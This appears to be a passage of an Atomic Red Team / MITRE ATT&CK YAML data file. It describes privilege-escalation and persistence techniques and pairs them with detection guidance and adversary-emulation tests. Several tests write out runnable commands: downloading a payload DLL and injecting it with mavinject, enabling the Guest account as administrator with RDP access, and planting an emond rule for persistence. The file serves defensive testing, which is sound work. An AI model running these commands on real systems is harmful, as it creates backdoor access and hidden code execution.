https://docs.microsoft.com/en-us/windows/win32/sbscs/about-side-by-side-assemblies- - description: Microsoft. (2018, May 31). About Side-by-Side Assemblies. Retrieved - March 13, 2020. - - source_name: FireEye DLL Side-Loading - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-dll-sideloading.pdf - description: 'Amanda Steward. (2014). FireEye DLL Side-Loading: A Thorn in - the Side of the Anti-Virus Industry. Retrieved March 13, 2020.' 
- object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: DLL Side-Loading - description: |- - Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program. - - Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable by replacing the legitimate DLL with a malicious one. (Citation: FireEye DLL Side-Loading) - - Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process. - id: attack-pattern--e64c62cf-9cd7-4a14-94ec-cdaac43ab44b - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-10-17T15:15:27.807Z' - created: '2020-03-13T19:41:37.908Z' - x_mitre_defense_bypassed: - - Anti-virus - - Application control - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_detection: Monitor processes for unusual activity (e.g., a process that - does not use the network begins to do so). 
Track DLL metadata, such as a hash, - and compare DLLs that are loaded at process execution time against previous - executions to detect differences that do not correlate with patching or updates. - x_mitre_data_sources: - - Loaded DLLs - - Process monitoring - - Process use of network - x_mitre_platforms: - - Windows - identifier: T1574.002 - atomic_tests: - - name: DLL Side-Loading using the Notepad++ GUP.exe binary - auto_generated_guid: 65526037-7079-44a9-bda1-2cb624838040 - description: | - GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded. - Upon execution, calc.exe will be opened. - supported_platforms: - - windows - input_arguments: - process_name: - description: Name of the created process - type: string - default: calculator.exe - gup_executable: - description: GUP is an open source signed binary used by Notepad++ for software - updates - type: path - default: PathToAtomicsFolder\T1574.002\bin\GUP.exe - dependency_executor_name: powershell - dependencies: - - description: 'Gup.exe binary must exist on disk at specified location (#{gup_executable}) - -' - prereq_command: 'if (Test-Path #{gup_executable}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{gup_executable}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/bin/GUP.exe?raw=true" -OutFile "#{gup_executable}" - executor: - command: "#{gup_executable}\n" - cleanup_command: 'taskkill /F /IM #{process_name} >nul 2>&1 - -' - name: command_prompt - T1078.001: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.001 - url: https://attack.mitre.org/techniques/T1078/001 - - external_id: CAPEC-70 - source_name: capec - url: https://capec.mitre.org/data/definitions/70.html - - source_name: Microsoft Local Accounts Feb 2019 - url: 
https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/local-accounts - description: Microsoft. (2018, December 9). Local Accounts. Retrieved February - 11, 2019. - - source_name: Metasploit SSH Module - url: https://github.com/rapid7/metasploit-framework/tree/master/modules/exploits/linux/ssh - description: undefined. (n.d.). Retrieved April 12, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Default Accounts - description: |- - Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built-into an OS, such as the Guest or Administrator accounts on Windows systems or default factory/provider set accounts on other types of systems, software, or devices.(Citation: Microsoft Local Accounts Feb 2019) - - Default accounts are not limited to client machines, rather also include accounts that are preset for equipment such as network devices and computer applications whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. 
Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://attack.mitre.org/techniques/T1552/004) or credential materials to legitimately connect to remote environments via [Remote Services](https://attack.mitre.org/techniques/T1021).(Citation: Metasploit SSH Module) - id: attack-pattern--6151cbea-819b-455a-9fa6-99a1cc58797d - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-09-16T19:41:43.491Z' - created: '2020-03-13T20:15:31.974Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Monitor whether default accounts have been activated or logged - into. These audits should also include checks on any appliances and applications - for default credentials or SSH keys, and if any are discovered, they should - be updated immediately. - x_mitre_data_sources: - - AWS CloudTrail logs - - Stackdriver logs - - Authentication logs - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows - - AWS - - GCP - - Azure - - Office 365 - - Azure AD - - SaaS - identifier: T1078.001 - atomic_tests: - - name: Enable Guest account with RDP capability and admin priviliges - auto_generated_guid: 99747561-ed8d-47f2-9c91-1e5fde1ed6e0 - description: After execution the Default Guest account will be enabled (Active) - and added to Administrators and Remote Desktop Users Group, and desktop will - allow multiple RDP connections - supported_platforms: - - windows - input_arguments: - guest_user: - description: Specify the guest account - type: String - default: guest - guest_password: - description: Specify the guest password - type: String - default: Password123! 
- executor: - command: |- - net user #{guest_user} /active:yes - net user #{guest_user} #{guest_password} - net localgroup administrators #{guest_user} /add - net localgroup "Remote Desktop Users" #{guest_user} /add - reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f - reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f - cleanup_command: |- - net user #{guest_user} /active:no >nul 2>&1 - net localgroup administrators #{guest_user} /delete >nul 2>&1 - net localgroup "Remote Desktop Users" #{guest_user} /delete >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /f >nul 2>&1 - reg delete "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /f >nul 2>&1 - name: command_prompt - elevation_required: true - T1078.002: - technique: - external_references: - - source_name: mitre-attack - external_id: T1078.002 - url: https://attack.mitre.org/techniques/T1078/002 - - external_id: CAPEC-560 - source_name: capec - url: https://capec.mitre.org/data/definitions/560.html - - url: https://technet.microsoft.com/en-us/library/dn535501.aspx - description: Microsoft. (2016, April 15). Attractive Accounts for Credential - Theft. Retrieved June 3, 2016. - source_name: TechNet Credential Theft - - source_name: Microsoft AD Accounts - url: https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts - description: Microsoft. (2019, August 23). Active Directory Accounts. Retrieved - March 13, 2020. - - url: https://technet.microsoft.com/en-us/library/dn487457.aspx - description: Microsoft. (2016, April 15). Audit Policy Recommendations. Retrieved - June 3, 2016. 
- source_name: TechNet Audit Policy - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Domain Accounts - description: |- - Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. (Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts) - - Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain. - id: attack-pattern--c3d4bdd9-2cfe-4a80-9d0c-07a29ecdce8f - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: initial-access - modified: '2020-09-16T19:42:11.787Z' - created: '2020-03-13T20:21:54.758Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - User - - Administrator - x_mitre_detection: |- - Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. 
Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access). - - Perform regular audits of domain accounts to detect accounts that may have been created by an adversary for persistence. - x_mitre_data_sources: - - Authentication logs - - Process monitoring - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1574.004: - technique: - id: attack-pattern--fc742192-19e3-466c-9eb5-964a97b29490 - description: |- - Adversaries may execute their own malicious payloads by hijacking ambiguous paths used to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that will be searched by the operating system before the legitimate library specified by the victim program, so that their malicious library will be loaded into the victim program instead. MacOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. - - A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X) - - If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. 
- name: Dylib Hijacking - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - external_id: T1574.004 - url: https://attack.mitre.org/techniques/T1574/004 - - external_id: CAPEC-471 - source_name: capec - url: https://capec.mitre.org/data/definitions/471.html - - url: https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf - description: Patrick Wardle. (2015). Writing Bad @$$ Malware for OS X. Retrieved - July 10, 2017. - source_name: Writing Bad Malware for OSX - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-09-16T16:48:09.391Z' - created: '2020-03-16T15:23:30.896Z' - x_mitre_platforms: - - macOS - x_mitre_data_sources: - - Process monitoring - - File monitoring - x_mitre_detection: 'Objective-See''s Dylib Hijacking Scanner can be used to - detect potential cases of dylib hijacking. Monitor file systems for moving, - renaming, replacing, or modifying dylibs. Changes in the set of dylibs that - are loaded by a process (compared to past behavior) that do not correlate - with known software, patches, etc., are suspicious. Check the system for multiple - dylibs with the same name and monitor which versions have historically been - loaded into a process. 
' - x_mitre_is_subtechnique: true - x_mitre_version: '1.0' - x_mitre_defense_bypassed: - - Application control - atomic_tests: [] - T1055.001: - technique: - created: '2020-01-14T01:26:08.145Z' - modified: '2020-06-20T22:17:59.148Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: defense-evasion - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - external_references: - - source_name: mitre-attack - external_id: T1055.001 - url: https://attack.mitre.org/techniques/T1055/001 - - url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process - description: 'Hosseini, A. (2017, July 18). Ten Process Injection Techniques: - A Technical Survey Of Common And Trending Process Injection Techniques. - Retrieved December 7, 2017.' - source_name: Endgame Process Injection July 2017 - - url: https://www.endgame.com/blog/technical-blog/hunting-memory - description: Desimone, J. (2017, June 13). Hunting in Memory. Retrieved December - 7, 2017. - source_name: Endgame HuntingNMemory June 2017 - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Dynamic-link Library Injection - description: "Adversaries may inject dynamic-link libraries (DLLs) into processes - in order to evade process-based defenses as well as possibly elevate privileges. - DLL injection is a method of executing arbitrary code in the address space - of a separate live process. \n\nDLL injection is commonly performed by writing - the path to a DLL in the virtual address space of the target process before - loading the DLL by invoking a new thread. The write can be performed with - native Windows API calls such as VirtualAllocEx and WriteProcessMemory, - then invoked with CreateRemoteThread (which calls the LoadLibrary - API responsible for loading the DLL). 
(Citation: Endgame Process Injection - July 2017) \n\nVariations of this method such as reflective DLL injection - (writing a self-mapping DLL into a process) and memory module (map DLL when - writing into process) overcome the address relocation issue as well as the - additional APIs to invoke execution (since these methods load and execute - the files in memory by manually preforming the function of LoadLibrary).(Citation: - Endgame HuntingNMemory June 2017)(Citation: Endgame Process Injection July - 2017) \n\nRunning code in the context of another process may allow access - to the process's memory, system/network resources, and possibly elevated privileges. - Execution via DLL injection may also evade detection from security products - since the execution is masked under a legitimate process. " - id: attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945 - x_mitre_defense_bypassed: - - Application control - - Anti-virus - x_mitre_data_sources: - - Process monitoring - - DLL monitoring - - File monitoring - - API monitoring - x_mitre_permissions_required: - - User - x_mitre_detection: "Monitoring Windows API calls indicative of the various types - of code injection may generate a significant amount of data and may not be - directly useful for defense unless collected under specific circumstances - for known bad sequences of calls, since benign use of API functions may be - common and difficult to distinguish from malicious behavior. Windows API calls - such as CreateRemoteThread and those that can be used to modify - memory within another process, such as VirtualAllocEx/WriteProcessMemory, - may be used for this technique.(Citation: Endgame Process Injection July 2017)\n\nMonitor - DLL/PE file events, specifically creation of these binary files as well as - the loading of DLLs into processes. Look for DLLs that are not recognized - or not normally loaded into a process. 
\n\nAnalyze process behavior to determine - if a process is performing actions it usually does not, such as opening network - connections, reading files, or other suspicious actions that could relate - to post-compromise behavior. " - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_platforms: - - Windows - identifier: T1055.001 - atomic_tests: - - name: Process Injection via mavinject.exe - auto_generated_guid: 74496461-11a1-4982-b439-4d87a550d254 - description: | - Windows 10 Utility To Inject DLLS. - - Upon successful execution, powershell.exe will download T1055.dll to disk. Powershell will then spawn mavinject.exe to perform process injection in T1055.dll. - With default arguments, expect to see a MessageBox, with notepad's icon in taskbar. - supported_platforms: - - windows - input_arguments: - process_id: - description: PID of input_arguments - type: Integer - default: "(Start-Process notepad -PassThru).id" - dll_payload: - description: DLL to Inject - type: Path - default: PathToAtomicsFolder\T1055.001\src\x64\T1055.001.dll - dependency_executor_name: powershell - dependencies: - - description: 'Utility to inject must exist on disk at specified location (#{dll_payload}) - -' - prereq_command: 'if (Test-Path #{dll_payload}) {exit 0} else {exit 1} - -' - get_prereq_command: | - New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.001/src/x64/T1055.001.dll" -OutFile "#{dll_payload}" - executor: - command: | - $mypid = #{process_id} - mavinject $mypid /INJECTRUNNING #{dll_payload} - name: powershell - elevation_required: true - T1548.004: - technique: - external_references: - - source_name: mitre-attack - external_id: T1548.004 - url: https://attack.mitre.org/techniques/T1548/004 - - source_name: AppleDocs AuthorizationExecuteWithPrivileges - url: 
https://developer.apple.com/documentation/security/1540038-authorizationexecutewithprivileg - description: Apple. (n.d.). Apple Developer Documentation - AuthorizationExecuteWithPrivileges. - Retrieved August 8, 2019. - - source_name: Death by 1000 installers; it's all broken! - url: https://speakerdeck.com/patrickwardle/defcon-2017-death-by-1000-installers-its-all-broken?slide=8 - description: Patrick Wardle. (2017). Death by 1000 installers; it's all broken!. - Retrieved August 8, 2019. - - source_name: Carbon Black Shlayer Feb 2019 - url: https://www.carbonblack.com/2019/02/12/tau-threat-intelligence-notification-new-macos-malware-variant-of-shlayer-osx-discovered/ - description: Carbon Black Threat Analysis Unit. (2019, February 12). New macOS - Malware Variant of Shlayer (OSX) Discovered. Retrieved August 8, 2019. - - source_name: OSX Coldroot RAT - url: https://objective-see.com/blog/blog_0x2A.html - description: Patrick Wardle. (2018, February 17). Tearing Apart the Undetected - (OSX)Coldroot RAT. Retrieved August 8, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Elevated Execution with Prompt - description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges - API to escalate privileges by prompting the user for credentials.(Citation: - AppleDocs AuthorizationExecuteWithPrivileges) The purpose of this API is to - give application developers an easy way to perform operations with root privileges, - such as for application installation or updating. This API does not validate - that the program requesting root privileges comes from a reputable source - or has been maliciously modified. \n\nAlthough this API is deprecated, it - still fully functions in the latest releases of macOS. When calling this API, - the user will be prompted to enter their credentials but no checks on the - origin or integrity of the program are made. 
The program calling the API may - also load world writable files which can be modified to perform malicious - behavior with elevated privileges.\n\nAdversaries may abuse AuthorizationExecuteWithPrivileges - to obtain root privileges in order to install malicious software on victims - and install persistence mechanisms.(Citation: Death by 1000 installers; it's - all broken!)(Citation: Carbon Black Shlayer Feb 2019)(Citation: OSX Coldroot - RAT) This technique may be combined with [Masquerading](https://attack.mitre.org/techniques/T1036) - to trick the user into granting escalated privileges to malicious code.(Citation: - Death by 1000 installers; it's all broken!)(Citation: Carbon Black Shlayer - Feb 2019) This technique has also been shown to work by modifying legitimate - programs present on the machine that make use of this API.(Citation: Death - by 1000 installers; it's all broken!)" - id: attack-pattern--b84903f0-c7d5-435d-a69e-de47cc3578c0 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-27T12:04:37.823Z' - created: '2020-01-30T14:40:20.187Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_effective_permissions: - - root - x_mitre_permissions_required: - - Administrator - - User - x_mitre_detection: Consider monitoring for /usr/libexec/security_authtrampoline - executions which may indicate that AuthorizationExecuteWithPrivileges - is being executed. MacOS system logs may also indicate when AuthorizationExecuteWithPrivileges - is being called. Monitoring OS API callbacks for the execution can also be - a way to detect this behavior but requires specialized security tooling. 
- x_mitre_data_sources: - - API monitoring - - Process monitoring - - File monitoring - x_mitre_contributors: - - Jimmy Astle, @AstleJimmy, Carbon Black - - Erika Noerenberg, @gutterchurl, Carbon Black - x_mitre_platforms: - - macOS - atomic_tests: [] - T1546.014: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546.014 - url: https://attack.mitre.org/techniques/T1546/014 - - source_name: xorrior emond Jan 2018 - url: https://www.xorrior.com/emond-persistence/ - description: Ross, Chris. (2018, January 17). Leveraging Emond on macOS For - Persistence. Retrieved September 10, 2019. - - source_name: magnusviri emond Apr 2016 - url: http://www.magnusviri.com/Mac/what-is-emond.html - description: Reynolds, James. (2016, April 7). What is emond?. Retrieved September - 10, 2019. - - source_name: sentinelone macos persist Jun 2019 - url: https://www.sentinelone.com/blog/how-malware-persists-on-macos/ - description: Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. - Retrieved September 10, 2019. - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Emond - description: |- - Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place. - - The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. 
The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) configuration file at/System/Library/LaunchDaemons/com.apple.emond.plist.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) - - Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.(Citation: xorrior emond Jan 2018)(Citation: magnusviri emond Apr 2016)(Citation: sentinelone macos persist Jun 2019) Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the [Launch Daemon](https://attack.mitre.org/techniques/T1543/004) service. - id: attack-pattern--9c45eaa3-8604-4780-8988-b5074dbb9ecd - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-03-24T21:37:25.307Z' - created: '2020-01-24T15:15:13.426Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - x_mitre_detection: Monitor emond rules creation by checking for files created - or modified in /etc/emond.d/rules/ and /private/var/db/emondClients. 
- x_mitre_data_sources: - - File monitoring - x_mitre_contributors: - - Ivan Sinyakov - x_mitre_platforms: - - macOS - identifier: T1546.014 - atomic_tests: - - name: Persistance with Event Monitor - emond - auto_generated_guid: 23c9c127-322b-4c75-95ca-eff464906114 - description: 'Establish persistence via a rule run by OSX''s emond (Event Monitor) - daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 - -' - supported_platforms: - - macos - input_arguments: - plist: - description: Path to attacker emond plist file - type: path - default: PathToAtomicsFolder/T1546.014/src/T1546.014_emond.plist - executor: - command: | - sudo cp "#{plist}" /etc/emond.d/rules/T1546.014_emond.plist - sudo touch /private/var/db/emondClients/T1546.014 - cleanup_command: | - sudo rm /etc/emond.d/rules/T1546.014_emond.plist - sudo rm /private/var/db/emondClients/T1546.014 - name: sh - elevation_required: true - T1546: - technique: - external_references: - - source_name: mitre-attack - external_id: T1546 - url: https://attack.mitre.org/techniques/T1546 - - url: https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-windows-management-instrumentation.pdf - description: Ballenthin, W., et al. (2015). Windows Management Instrumentation - (WMI) Offense, Defense, and Forensics. Retrieved March 30, 2016. - source_name: FireEye WMI 2015 - - url: https://www.rsaconference.com/writable/presentations/file_upload/ht-r03-malware-persistence-on-os-x-yosemite_final.pdf - description: Patrick Wardle. (2015). Malware Persistence on OS X Yosemite. - Retrieved July 10, 2017. - source_name: Malware Persistence on OS X - - url: https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/ - description: Claud Xiao, Cong Zheng, Yanhui Jia. (2017, April 6). New IoT/Linux - Malware Targets DVRs, Forms Botnet. Retrieved February 19, 2018. 
- source_name: amnesia malware - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Event Triggered Execution - description: "Adversaries may establish persistence and/or elevate privileges - using system mechanisms that trigger execution based on specific events. Various - operating systems have means to monitor and subscribe to events such as logons - or other user activity such as running specific applications/binaries. \n\nAdversaries - may abuse these mechanisms as a means of maintaining persistent access to - a victim via repeatedly executing malicious code. After gaining access to - a victim system, adversaries may create/modify event triggers to point to - malicious content that will be executed whenever the event trigger is invoked.(Citation: - FireEye WMI 2015)(Citation: Malware Persistence on OS X)(Citation: amnesia - malware)\n\nSince the execution can be proxied by an account with higher permissions, - such as SYSTEM or service accounts, an adversary may be able to abuse these - triggered execution mechanisms to escalate their privileges. " - id: attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: persistence - modified: '2020-10-21T18:48:27.576Z' - created: '2020-01-22T21:04:23.285Z' - x_mitre_version: '1.1' - x_mitre_is_subtechnique: false - x_mitre_detection: "Monitoring for additions or modifications of mechanisms - that could be used to trigger event-based execution, especially the addition - of abnormal commands such as execution of unknown programs, opening network - sockets, or reaching out across the network. Also look for changes that do - not line up with updates, patches, or other planned administrative activity. 
- \n\nThese mechanisms may vary by OS, but are typically stored in central repositories - that store configuration information such as the Windows Registry, Common - Information Model (CIM), and/or specific named files, the last of which can - be hashed and compared to known good values. \n\nMonitor for processes, API/System - calls, and other common ways of manipulating these event repositories. \n\nTools - such as Sysinternals Autoruns can be used to detect changes to execution triggers - that could be attempts at persistence. Also look for abnormal process call - trees for execution of other commands that could relate to Discovery actions - or other techniques. \n\nMonitor DLL loads by processes, specifically looking - for DLLs that are not recognized or not normally loaded into a process. Look - for abnormal process behavior that may be due to a process loading a malicious - DLL. Data and events should not be viewed in isolation, but as part of a chain - of behavior that could lead to other activities, such as making network connections - for Command and Control, learning details about the environment through Discovery, - and conducting Lateral Movement. " - x_mitre_data_sources: - - API monitoring - - Windows event logs - - System calls - - Binary file metadata - - Process use of network - - WMI Objects - - File monitoring - - Process command-line parameters - - Process monitoring - - Loaded DLLs - - DLL monitoring - - Windows Registry - x_mitre_platforms: - - Linux - - macOS - - Windows - atomic_tests: [] - T1574.005: - technique: - external_references: - - source_name: mitre-attack - external_id: T1574.005 - url: https://attack.mitre.org/techniques/T1574/005 - - source_name: mozilla_sec_adv_2012 - url: https://www.mozilla.org/en-US/security/advisories/mfsa2012-98/ - description: Robert Kugler. (2012, November 20). Mozilla Foundation Security - Advisory 2012-98. Retrieved March 10, 2017. 
- - source_name: Executable Installers are Vulnerable - url: https://seclists.org/fulldisclosure/2015/Dec/34 - description: 'Stefan Kanthak. (2015, December 8). Executable installers are - vulnerable^WEVIL (case 7): 7z*.exe allows remote code execution with escalation - of privilege. Retrieved December 4, 2014.' - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 - name: Executable Installer File Permissions Weakness - description: |- - Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself, are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM. - - Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the %TEMP% directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). 
- - Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012) (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence. - id: attack-pattern--70d81154-b187-45f9-8ec5-295d01255979 - type: attack-pattern - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: persistence - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - - kill_chain_name: mitre-attack - phase_name: defense-evasion - modified: '2020-03-26T19:20:23.030Z' - created: '2020-03-13T11:12:18.558Z' - x_mitre_version: '1.0' - x_mitre_is_subtechnique: true - x_mitre_permissions_required: - - Administrator - - User - x_mitre_effective_permissions: - - Administrator - - User - - SYSTEM - x_mitre_detection: |- - Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data. - - Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. 
- x_mitre_data_sources: - - Process command-line parameters - - File monitoring - x_mitre_contributors: - - Travis Smith, Tripwire - - Stefan Kanthak - x_mitre_platforms: - - Windows - atomic_tests: [] - T1068: - technique: - created: '2017-05-31T21:30:55.066Z' - modified: '2020-03-26T21:12:49.194Z' - kill_chain_phases: - - kill_chain_name: mitre-attack - phase_name: privilege-escalation - type: attack-pattern - object_marking_refs: - - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168 - external_references: - - source_name: mitre-attack - url: https://attack.mitre.org/techniques/T1068 - external_id: T1068 - description: |- - Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. - - When initially gaining access to a system, an 